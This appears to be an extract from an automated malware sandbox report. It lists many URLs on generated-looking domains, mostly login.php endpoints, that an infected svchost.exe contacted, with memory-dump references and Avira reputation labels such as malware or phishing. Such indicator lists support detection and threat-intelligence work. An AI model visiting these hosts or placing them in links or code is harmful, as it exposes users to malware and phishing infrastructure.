                                                                                                                                                                                                            http://lymyner.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560998370.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyrymuj.com/svchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pupyguq.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063763771.000000000297C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064442464.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2067567385.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643724869.00000000029AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyvab.com/login.phpsvchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669412325.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2087743263.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090303553.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygysij.com/svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujycil.com/login.phpsvchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648621076.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514446491.00000000060C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2572250638.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyhyl.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586377868.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579923926.000000000615C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585383980.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580902534.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575937729.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576857106.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576872039.000000000615A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1586144218.0000000006098000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujyteq.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qexynyp.com/svchost.exe, 00000002.00000003.1527969887.00000000060F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533636747.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qegylep.com/pXsvchost.exe, 00000002.00000003.1841502213.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841504956.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyvil.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vowykaf.com/login.phpsvchost.exe, 00000002.00000003.1550432575.0000000002958000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533898265.0000000002957000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526067014.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1562948495.0000000002953000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1526019425.000000000294D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetynev.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1587578794.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedyfyq.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681527085.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1786991101.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1700243441.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1727481945.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799982430.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722817064.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1686100811.00000000008A9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyniw.com/login.phpsvchost.exe, 00000002.00000003.1680991545.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1419020654.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682710419.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1447172965.000000000600D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1441699638.00000000060AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2664198427.000000000615D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2657962041.0000000003A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1681533109.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716010789.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1687537951.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1677983877.000000000602A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://volykyc.com/http://qeqysag.com/http://ganypih.com/http://lymysan.com/http://lymysan.com/http:svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyxiq.com/svchost.exe, 00000002.00000003.1715978327.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1719752875.00000000060F9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726087708.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahykih.com/login.phpcom/login.phpsvchost.exe, 00000002.00000003.1580252694.00000000029FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gaqyres.com/login.phpsvchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxygur.com/login.phpsvchost.exe, 00000002.00000003.1671559153.00000000029B2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2514302068.00000000008A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2105138614.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090770576.0000000002954000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2090328753.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029AE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2091016673.0000000002956000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vonyryc.com/login.phpgsvchost.exe, 00000002.00000003.1460822069.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1459693499.00000000008A1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pujyjav.com/http://qebytiq.com/http://vopybyt.com/http://gatyvyz.com/http://lyvytuj.com/http:svchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gadyhoh.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2073422761.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2065117922.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vojyjof.com/http://gahyhob.com/Hsvchost.exe, 00000002.00000002.2654281668.00000000029C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2587062256.00000000029C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahynuw.com/login.phpsvchost.exe, 00000002.00000003.1671294186.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574743702.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2661239909.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085300413.000000000602A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vopybyt.com/svchost.exe, 00000002.00000003.1700442233.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1423883951.00000000060FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2648375447.0000000000894000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1417918373.000000000612C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qeqyxyp.com/login.phpsvchost.exe, 00000002.00000003.1594664611.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600411612.000000000295A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1887285492.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lygyjuj.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881654799.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1580917080.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://pumyjip.com/login.phpsvchost.exe, 00000002.00000003.2569536578.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2098478160.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2574329163.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1685225078.000000000297E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654165963.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyvytud.com/svchost.exe, 00000002.00000003.2069850659.00000000060EF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077691101.00000000060FD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: phishing
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://lyxyxox.com/login.phpsvchost.exe, 00000002.00000003.2063505060.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1670374501.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1643461384.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1660268738.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1641493394.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1669951081.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650532264.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648460098.00000000029BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qedykiv.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975297183.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841502213.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1904366746.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1862569690.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839664919.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1561154923.0000000006031000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881676347.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1876562818.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1560818719.000000000B444000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://vocypok.com/login.phpsvchost.exe, 00000002.00000003.2063012726.0000000002953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://qetyveq.com/login.phpsvchost.exe, 00000002.00000003.2094100797.00000000029FE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2654719612.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078075418.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095132810.00000000029FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650594979.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2077922127.0000000002959000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://puvydov.com/login.phpsvchost.exe, 00000002.00000003.1839598278.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1849105245.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1853453281.00000000029BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1850188368.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585643847.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1572395938.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559127231.000000000B458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://gahyqub.com/login.phpsvchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599208546.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1991054735.0000000003A22000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1987963029.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595800717.0000000006035000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600414604.0000000006098000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1982680914.00000000029D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                                            		unknown
